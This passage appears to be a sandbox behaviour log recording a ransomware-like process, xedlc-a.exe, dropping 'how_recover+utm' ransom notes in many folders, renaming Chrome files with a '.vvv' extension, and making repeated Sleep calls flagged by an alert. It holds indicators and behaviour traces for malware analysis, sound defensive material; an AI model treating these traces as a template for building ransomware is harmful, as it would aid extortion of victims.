60840.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
60841.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
60842.          processinfo:
60843.            pid: 1056
60844.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
60845.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
60846.            ads:
60847.          fid (ads:): 281474976778487
60848.          ntstatus: 0x0
60849.          CreateOptions: 0x0
60850.        file:
60851.          timestamp: 93274
60852.          mode: created
60853.          sequenceNumber: 1697
60854.          value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Color\how_recover+utm.html
60855.          processinfo:
60856.            pid: 1056
60857.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
60858.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
60859.            ads:
60860.          fid (ads:): 281474976778488
60861.          ntstatus: 0x0
60862.          CreateOptions: 0x60
60863.        file:
60864.          timestamp: 93281
60865.          mode: close
60866.          sequenceNumber: 1698
60867.          value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Color\how_recover+utm.html
60868.          filesize: 9495
60869.          md5sum: 95f596a25dff51b6af2042b1bbe02985
60870.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
60871.          processinfo:
60872.            pid: 1056
60873.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
60874.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
60875.            ads:
60876.          fid (ads:): 281474976778488
60877.          ntstatus: 0x0
60878.          CreateOptions: 0x0
60879.        file:
60880.          timestamp: 93291
60881.          mode: created
60882.          sequenceNumber: 1699
60883.          value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Updater6\Install\how_recover+utm.txt
60884.          processinfo:
60885.            pid: 1056
60886.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
60887.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
60888.            ads:
60889.          fid (ads:): 281474976778489
60890.          ntstatus: 0x0
60891.          CreateOptions: 0x60
60892.        file:
60893.          timestamp: 93298
60894.          mode: close
60895.          sequenceNumber: 1700
60896.          value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Updater6\Install\how_recover+utm.txt
60897.          filesize: 2682
60898.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
60899.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
60900.          processinfo:
60901.            pid: 1056
60902.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
60903.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
60904.            ads:
60905.          fid (ads:): 281474976778489
60906.          ntstatus: 0x0
60907.          CreateOptions: 0x0
60908.        file:
60909.          timestamp: 93306
60910.          mode: created
60911.          sequenceNumber: 1701
60912.          value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Updater6\Install\how_recover+utm.html
60913.          processinfo:
60914.            pid: 1056
60915.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
60916.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
60917.            ads:
60918.          fid (ads:): 281474976778490
60919.          ntstatus: 0x0
60920.          CreateOptions: 0x60
60921.        file:
60922.          timestamp: 93313
60923.          mode: close
60924.          sequenceNumber: 1702
60925.          value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Updater6\Install\how_recover+utm.html
60926.          filesize: 9495
60927.          md5sum: 95f596a25dff51b6af2042b1bbe02985
60928.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
60929.          processinfo:
60930.            pid: 1056
60931.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
60932.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
60933.            ads:
60934.          fid (ads:): 281474976778490
60935.          ntstatus: 0x0
60936.          CreateOptions: 0x0
60937.        file:
60938.          timestamp: 93321
60939.          mode: created
60940.          sequenceNumber: 1703
60941.          value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Updater6\how_recover+utm.txt
60942.          processinfo:
60943.            pid: 1056
60944.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
60945.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
60946.            ads:
60947.          fid (ads:): 281474976778491
60948.          ntstatus: 0x0
60949.          CreateOptions: 0x60
60950.        file:
60951.          timestamp: 93326
60952.          mode: close
60953.          sequenceNumber: 1704
60954.          value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Updater6\how_recover+utm.txt
60955.          filesize: 2682
60956.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
60957.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
60958.          processinfo:
60959.            pid: 1056
60960.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
60961.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
60962.            ads:
60963.          fid (ads:): 281474976778491
60964.          ntstatus: 0x0
60965.          CreateOptions: 0x0
60966.        file:
60967.          timestamp: 93401
60968.          mode: created
60969.          sequenceNumber: 1705
60970.          value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Updater6\how_recover+utm.html
60971.          processinfo:
60972.            pid: 1056
60973.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
60974.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
60975.            ads:
60976.          fid (ads:): 281474976778492
60977.          ntstatus: 0x0
60978.          CreateOptions: 0x60
60979.        file:
60980.          timestamp: 93407
60981.          mode: close
60982.          sequenceNumber: 1706
60983.          value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Updater6\how_recover+utm.html
60984.          filesize: 9495
60985.          md5sum: 95f596a25dff51b6af2042b1bbe02985
60986.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
60987.          processinfo:
60988.            pid: 1056
60989.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
60990.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
60991.            ads:
60992.          fid (ads:): 281474976778492
60993.          ntstatus: 0x0
60994.          CreateOptions: 0x0
60995.        file:
60996.          timestamp: 93990
60997.          mode: created
60998.          sequenceNumber: 1707
60999.          value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\how_recover+utm.txt
61000.          processinfo:
61001.            pid: 1056
61002.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
61003.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
61004.            ads:
61005.          fid (ads:): 281474976778493
61006.          ntstatus: 0x0
61007.          CreateOptions: 0x60
61008.        file:
61009.          timestamp: 93996
61010.          mode: close
61011.          sequenceNumber: 1708
61012.          value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\how_recover+utm.txt
61013.          filesize: 2682
61014.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
61015.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
61016.          processinfo:
61017.            pid: 1056
61018.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
61019.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
61020.            ads:
61021.          fid (ads:): 281474976778493
61022.          ntstatus: 0x0
61023.          CreateOptions: 0x0
61024.        file:
61025.          timestamp: 94065
61026.          mode: created
61027.          sequenceNumber: 1709
61028.          value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\how_recover+utm.html
61029.          processinfo:
61030.            pid: 1056
61031.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
61032.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
61033.            ads:
61034.          fid (ads:): 281474976778494
61035.          ntstatus: 0x0
61036.          CreateOptions: 0x60
61037.        file:
61038.          timestamp: 94071
61039.          mode: close
61040.          sequenceNumber: 1710
61041.          value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\how_recover+utm.html
61042.          filesize: 9495
61043.          md5sum: 95f596a25dff51b6af2042b1bbe02985
61044.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
61045.          processinfo:
61046.            pid: 1056
61047.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
61048.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
61049.            ads:
61050.          fid (ads:): 281474976778494
61051.          ntstatus: 0x0
61052.          CreateOptions: 0x0
61053.        file:
61054.          timestamp: 94092
61055.          mode: created
61056.          sequenceNumber: 1711
61057.          value: C:\Documents and Settings\admin\Local Settings\Application Data\Apple Computer\QuickTime\how_recover+utm.txt
61058.          processinfo:
61059.            pid: 1056
61060.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
61061.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
61062.            ads:
61063.          fid (ads:): 281474976778495
61064.          ntstatus: 0x0
61065.          CreateOptions: 0x60
61066.        file:
61067.          timestamp: 94100
61068.          mode: close
61069.          sequenceNumber: 1712
61070.          value: C:\Documents and Settings\admin\Local Settings\Application Data\Apple Computer\QuickTime\how_recover+utm.txt
61071.          filesize: 2682
61072.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
61073.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
61074.          processinfo:
61075.            pid: 1056
61076.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
61077.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
61078.            ads:
61079.          fid (ads:): 281474976778495
61080.          ntstatus: 0x0
61081.          CreateOptions: 0x0
61082.        file:
61083.          timestamp: 94138
61084.          mode: created
61085.          sequenceNumber: 1713
61086.          value: C:\Documents and Settings\admin\Local Settings\Application Data\Apple Computer\QuickTime\how_recover+utm.html
61087.          processinfo:
61088.            pid: 1056
61089.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
61090.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
61091.            ads:
61092.          fid (ads:): 281474976778496
61093.          ntstatus: 0x0
61094.          CreateOptions: 0x60
61095.        file:
61096.          timestamp: 94144
61097.          mode: close
61098.          sequenceNumber: 1714
61099.          value: C:\Documents and Settings\admin\Local Settings\Application Data\Apple Computer\QuickTime\how_recover+utm.html
61100.          filesize: 9495
61101.          md5sum: 95f596a25dff51b6af2042b1bbe02985
61102.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
61103.          processinfo:
61104.            pid: 1056
61105.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
61106.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
61107.            ads:
61108.          fid (ads:): 281474976778496
61109.          ntstatus: 0x0
61110.          CreateOptions: 0x0
61111.        file:
61112.          timestamp: 94152
61113.          mode: created
61114.          sequenceNumber: 1715
61115.          value: C:\Documents and Settings\admin\Local Settings\Application Data\Apple Computer\how_recover+utm.txt
61116.          processinfo:
61117.            pid: 1056
61118.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
61119.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
61120.            ads:
61121.          fid (ads:): 281474976778497
61122.          ntstatus: 0x0
61123.          CreateOptions: 0x60
61124.        file:
61125.          timestamp: 94158
61126.          mode: close
61127.          sequenceNumber: 1716
61128.          value: C:\Documents and Settings\admin\Local Settings\Application Data\Apple Computer\how_recover+utm.txt
61129.          filesize: 2682
61130.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
61131.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
61132.          processinfo:
61133.            pid: 1056
61134.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
61135.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
61136.            ads:
61137.          fid (ads:): 281474976778497
61138.          ntstatus: 0x0
61139.          CreateOptions: 0x0
61140.        file:
61141.          timestamp: 94308
61142.          mode: created
61143.          sequenceNumber: 1717
61144.          value: C:\Documents and Settings\admin\Local Settings\Application Data\Apple Computer\how_recover+utm.html
61145.          processinfo:
61146.            pid: 1056
61147.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
61148.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
61149.            ads:
61150.          fid (ads:): 281474976778498
61151.          ntstatus: 0x0
61152.          CreateOptions: 0x60
61153.        file:
61154.          timestamp: 94314
61155.          mode: close
61156.          sequenceNumber: 1718
61157.          value: C:\Documents and Settings\admin\Local Settings\Application Data\Apple Computer\how_recover+utm.html
61158.          filesize: 9495
61159.          md5sum: 95f596a25dff51b6af2042b1bbe02985
61160.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
61161.          processinfo:
61162.            pid: 1056
61163.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
61164.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
61165.            ads:
61166.          fid (ads:): 281474976778498
61167.          ntstatus: 0x0
61168.          CreateOptions: 0x0
61169.        file:
61170.          timestamp: 94350
61171.          mode: open
61172.          sequenceNumber: 1719
61173.          value: C:\Documents and Settings\admin\Local Settings\Application Data\Google\Chrome\Application\26.0.1410.43\chrome_100_percent.pak
61174.          filesize: 882175
61175.          processinfo:
61176.            pid: 1056
61177.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
61178.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
61179.            ads:
61180.          fid (ads:): 281474976766019
61181.          ntstatus: 0x0
61182.          CreateOptions: 0x60
61183.        file:
61184.          timestamp: 94655
61185.          mode: close
61186.          sequenceNumber: 1720
61187.          value: C:\Documents and Settings\admin\Local Settings\Application Data\Google\Chrome\Application\26.0.1410.43\chrome_100_percent.pak
61188.          filesize: 882590
61189.          md5sum: 7f1b248fb538990bbbb28450e8fa7ca4
61190.          sha1sum: f74cd315d3e28bbd47682b66fdd36fb1a51d02f1
61191.          processinfo:
61192.            pid: 1056
61193.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
61194.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
61195.            ads:
61196.          fid (ads:): 281474976766019
61197.          ntstatus: 0x0
61198.          CreateOptions: 0x0
61199.        file:
61200.          timestamp: 94665
61201.          mode: rename
61202.          sequenceNumber: 1721
61203.          filesize: 882590
61204.          md5sum: 7f1b248fb538990bbbb28450e8fa7ca4
61205.          sha1sum: f74cd315d3e28bbd47682b66fdd36fb1a51d02f1
61206.          processinfo:
61207.            pid: 1056
61208.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
61209.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
61210.          old_name: C:\Documents and Settings\admin\Local Settings\Application Data\Google\Chrome\Application\26.0.1410.43\chrome_100_percent.pak
61211.          new_name: C:\Documents and Settings\admin\Local Settings\Application Data\Google\Chrome\Application\26.0.1410.43\chrome_100_percent.pak.vvv
61212.            ads:
61213.          fid (ads:): 281474976766019
61214.          ntstatus: 0x0
61215.          CreateOptions: 0x0
61216.        file:
61217.          timestamp: 94675
61218.          mode: open
61219.          sequenceNumber: 1722
61220.          value: C:\Documents and Settings\admin\Local Settings\Application Data\Google\Chrome\Application\26.0.1410.43\chrome_touch_100_percent.pak
61221.          filesize: 894948
61222.          processinfo:
61223.            pid: 1056
61224.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
61225.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
61226.            ads:
61227.          fid (ads:): 281474976766020
61228.          ntstatus: 0x0
61229.          CreateOptions: 0x60
61230.        file:
61231.          timestamp: 94883
61232.          mode: close
61233.          sequenceNumber: 1723
61234.          value: C:\Documents and Settings\admin\Local Settings\Application Data\Google\Chrome\Application\26.0.1410.43\chrome_touch_100_percent.pak
61235.          filesize: 895374
61236.          md5sum: 668b8573303e223c49ca30448ee973e5
61237.          sha1sum: cc64ac5efc40742c77ade73cf3022d56c01f5f01
61238.          processinfo:
61239.            pid: 1056
61240.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
61241.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
61242.            ads:
61243.          fid (ads:): 281474976766020
61244.          ntstatus: 0x0
61245.          CreateOptions: 0x0
61246.        file:
61247.          timestamp: 94896
61248.          mode: rename
61249.          sequenceNumber: 1724
61250.          filesize: 895374
61251.          md5sum: 668b8573303e223c49ca30448ee973e5
61252.          sha1sum: cc64ac5efc40742c77ade73cf3022d56c01f5f01
61253.          processinfo:
61254.            pid: 1056
61255.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
61256.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
61257.          old_name: C:\Documents and Settings\admin\Local Settings\Application Data\Google\Chrome\Application\26.0.1410.43\chrome_touch_100_percent.pak
61258.          new_name: C:\Documents and Settings\admin\Local Settings\Application Data\Google\Chrome\Application\26.0.1410.43\chrome_touch_100_percent.pak.vvv
61259.            ads:
61260.          fid (ads:): 281474976766020
61261.          ntstatus: 0x0
61262.          CreateOptions: 0x0
61263.        file:
61264.          timestamp: 94929
61265.          mode: created
61266.          sequenceNumber: 1725
61267.          value: C:\Documents and Settings\admin\Local Settings\Application Data\Google\Chrome\Application\26.0.1410.43\default_apps\how_recover+utm.txt
61268.          processinfo:
61269.            pid: 1056
61270.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
61271.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
61272.            ads:
61273.          fid (ads:): 281474976778499
61274.          ntstatus: 0x0
61275.          CreateOptions: 0x60
61276.        file:
61277.          timestamp: 94935
61278.          mode: close
61279.          sequenceNumber: 1726
61280.          value: C:\Documents and Settings\admin\Local Settings\Application Data\Google\Chrome\Application\26.0.1410.43\default_apps\how_recover+utm.txt
61281.          filesize: 2682
61282.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
61283.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
61284.          processinfo:
61285.            pid: 1056
61286.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
61287.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
61288.            ads:
61289.          fid (ads:): 281474976778499
61290.          ntstatus: 0x0
61291.          CreateOptions: 0x0
61292.        file:
61293.          timestamp: 94943
61294.          mode: created
61295.          sequenceNumber: 1727
61296.          value: C:\Documents and Settings\admin\Local Settings\Application Data\Google\Chrome\Application\26.0.1410.43\default_apps\how_recover+utm.html
61297.          processinfo:
61298.            pid: 1056
61299.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
61300.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
61301.            ads:
61302.          fid (ads:): 281474976778500
61303.          ntstatus: 0x0
61304.          CreateOptions: 0x60
61305.        file:
61306.          timestamp: 94950
61307.          mode: close
61308.          sequenceNumber: 1728
61309.          value: C:\Documents and Settings\admin\Local Settings\Application Data\Google\Chrome\Application\26.0.1410.43\default_apps\how_recover+utm.html
61310.          filesize: 9495
61311.          md5sum: 95f596a25dff51b6af2042b1bbe02985
61312.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
61313.          processinfo:
61314.            pid: 1056
61315.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
61316.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
61317.            ads:
61318.          fid (ads:): 281474976778500
61319.          ntstatus: 0x0
61320.          CreateOptions: 0x0
61321.        file:
61322.          timestamp: 94959
61323.          mode: created
61324.          sequenceNumber: 1729
61325.          value: C:\Documents and Settings\admin\Local Settings\Application Data\Google\Chrome\Application\26.0.1410.43\Extensions\how_recover+utm.txt
61326.          processinfo:
61327.            pid: 1056
61328.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
61329.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
61330.            ads:
61331.          fid (ads:): 281474976778501
61332.          ntstatus: 0x0
61333.          CreateOptions: 0x60
61334.        file:
61335.          timestamp: 94965
61336.          mode: close
61337.          sequenceNumber: 1730
61338.          value: C:\Documents and Settings\admin\Local Settings\Application Data\Google\Chrome\Application\26.0.1410.43\Extensions\how_recover+utm.txt
61339.          filesize: 2682
61340.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
61341.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
61342.          processinfo:
61343.            pid: 1056
61344.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
61345.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
61346.            ads:
61347.          fid (ads:): 281474976778501
61348.          ntstatus: 0x0
61349.          CreateOptions: 0x0
61350.        file:
61351.          timestamp: 94984
61352.          mode: created
61353.          sequenceNumber: 1731
61354.          value: C:\Documents and Settings\admin\Local Settings\Application Data\Google\Chrome\Application\26.0.1410.43\Extensions\how_recover+utm.html
61355.          processinfo:
61356.            pid: 1056
61357.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
61358.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
61359.            ads:
61360.          fid (ads:): 281474976778502
61361.          ntstatus: 0x0
61362.          CreateOptions: 0x60
61363.        file:
61364.          timestamp: 94992
61365.          mode: close
61366.          sequenceNumber: 1732
61367.          value: C:\Documents and Settings\admin\Local Settings\Application Data\Google\Chrome\Application\26.0.1410.43\Extensions\how_recover+utm.html
61368.          filesize: 9495
61369.          md5sum: 95f596a25dff51b6af2042b1bbe02985
61370.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
61371.          processinfo:
61372.            pid: 1056
61373.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
61374.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
61375.            ads:
61376.          fid (ads:): 281474976778502
61377.          ntstatus: 0x0
61378.          CreateOptions: 0x0
61379.        file:
61380.          timestamp: 95034
61381.          mode: open
61382.          sequenceNumber: 1733
61383.          value: C:\Documents and Settings\admin\Local Settings\Application Data\Google\Chrome\Application\26.0.1410.43\Installer\chrome.7z
61384.          filesize: 122395900
61385.          processinfo:
61386.            pid: 1056
61387.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
61388.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
61389.            ads:
61390.          fid (ads:): 844424930186896
61391.          ntstatus: 0x0
61392.          CreateOptions: 0x60
61393.        apicall:
61394.          timestamp: 99130
61395.          repeat: 200
61396.          sequenceNumber: 1734
61397.          processinfo:
61398.            pid: 1056
61399.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
61400.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
61401.          dllname: kernel32.dll
61402.          apiname: Sleep
61403.          address: 0x0041ed5b
61404.        apicall:
61405.          timestamp: 112851
61406.          repeat: 300
61407.          sequenceNumber: 1735
61408.          processinfo:
61409.            pid: 1056
61410.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
61411.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
61412.          dllname: kernel32.dll
61413.          apiname: Sleep
61414.          address: 0x0041ed5b
61415.        apicall:
61416.          timestamp: 115308
61417.          repeat: 400
61418.          sequenceNumber: 1736
61419.          processinfo:
61420.            pid: 1056
61421.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
61422.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
61423.          dllname: kernel32.dll
61424.          apiname: Sleep
61425.          address: 0x0041ed5b
61426.        apicall:
61427.          timestamp: 115378
61428.          repeat: 500
61429.          sequenceNumber: 1737
61430.          processinfo:
61431.            pid: 1056
61432.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
61433.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
61434.          dllname: kernel32.dll
61435.          apiname: Sleep
61436.          address: 0x0041ed5b
61437.        apicall:
61438.          timestamp: 115448
61439.          repeat: 600
61440.          sequenceNumber: 1738
61441.          processinfo:
61442.            pid: 1056
61443.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
61444.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
61445.          dllname: kernel32.dll
61446.          apiname: Sleep
61447.          address: 0x0041ed5b
61448.        apicall:
61449.          timestamp: 115517
61450.          repeat: 700
61451.          sequenceNumber: 1739
61452.          processinfo:
61453.            pid: 1056
61454.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
61455.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
61456.          dllname: kernel32.dll
61457.          apiname: Sleep
61458.          address: 0x0041ed5b
61459.        apicall:
61460.          timestamp: 115601
61461.          repeat: 800
61462.          sequenceNumber: 1740
61463.          processinfo:
61464.            pid: 1056
61465.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
61466.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
61467.          dllname: kernel32.dll
61468.          apiname: Sleep
61469.          address: 0x0041ed5b
61470.        apicall:
61471.          timestamp: 115674
61472.          repeat: 900
61473.          sequenceNumber: 1741
61474.          processinfo:
61475.            pid: 1056
61476.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
61477.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
61478.          dllname: kernel32.dll
61479.          apiname: Sleep
61480.          address: 0x0041ed5b
61481.        apicall:
61482.          timestamp: 115769
61483.          repeat: 1000
61484.          sequenceNumber: 1742
61485.          processinfo:
61486.            pid: 1056
61487.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
61488.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
61489.          dllname: kernel32.dll
61490.          apiname: Sleep
61491.          address: 0x0041ed5b
61492.        malicious-alert:
61493.          classtype: High Repeated Sleep Calls
61494.          weight: 0
61495.          ruleid: 5202 : High repeated sleep calls ; High repeated number of sleep calls
61496.          msg: High repeated number of sleep calls
61497.          display-msg: High repeated sleep calls
61498.        apicall:
61499.          timestamp: 116439
61500.          repeat: 2000
61501.          sequenceNumber: 1743
61502.          processinfo:
61503.            pid: 1056
61504.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
61505.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
61506.          dllname: kernel32.dll
61507.          apiname: Sleep
61508.          address: 0x0041ed5b
61509.        apicall:
61510.          timestamp: 117118
61511.          repeat: 3000
61512.          sequenceNumber: 1744
61513.          processinfo:
61514.            pid: 1056
61515.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
61516.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
61517.          dllname: kernel32.dll
61518.          apiname: Sleep
61519.          address: 0x0041ed5b
61520.        apicall:
61521.          timestamp: 117785
61522.          repeat: 4000
61523.          sequenceNumber: 1745
61524.          processinfo:
61525.            pid: 1056
61526.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
61527.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
61528.          dllname: kernel32.dll
61529.          apiname: Sleep
61530.          address: 0x0041ed5b
61531.        apicall:
61532.          timestamp: 118455
61533.          repeat: 5000
61534.          sequenceNumber: 1746
61535.          processinfo:
61536.            pid: 1056
61537.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
61538.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
61539.          dllname: kernel32.dll
61540.          apiname: Sleep
61541.          address: 0x0041ed5b
61542.        apicall:
61543.          timestamp: 119137
61544.          repeat: 6000
61545.          sequenceNumber: 1747
61546.          processinfo:
61547.            pid: 1056
61548.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
61549.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
61550.          dllname: kernel32.dll
61551.          apiname: Sleep
61552.          address: 0x0041ed5b
61553.        apicall:
61554.          timestamp: 119817
61555.          repeat: 7000
61556.          sequenceNumber: 1748
61557.          processinfo:
61558.            pid: 1056
61559.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
61560.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
61561.          dllname: kernel32.dll
61562.          apiname: Sleep
61563.          address: 0x0041ed5b
61564.        apicall:
61565.          timestamp: 120592
61566.          repeat: 8000
61567.          sequenceNumber: 1749
61568.          processinfo:
61569.            pid: 1056
61570.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
61571.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
61572.          dllname: kernel32.dll
61573.          apiname: Sleep
61574.          address: 0x0041ed5b
61575.        apicall:
61576.          timestamp: 121248
61577.          repeat: 9000
61578.          sequenceNumber: 1750
61579.          processinfo:
61580.            pid: 1056
61581.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
61582.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
61583.          dllname: kernel32.dll
61584.          apiname: Sleep
61585.          address: 0x0041ed5b
61586.        apicall:
61587.          timestamp: 121912
61588.          repeat: 10000
61589.          sequenceNumber: 1751
61590.          processinfo:
61591.            pid: 1056
61592.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
61593.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
61594.          dllname: kernel32.dll
61595.          apiname: Sleep
61596.          address: 0x0041ed5b
61597.        apicall:
61598.          timestamp: 129464
61599.          repeat: 20000
61600.          sequenceNumber: 1752
61601.          processinfo:
61602.            pid: 1056
61603.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
61604.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
61605.          dllname: kernel32.dll
61606.          apiname: Sleep
61607.          address: 0x0041ed5b
61608.        apicall:
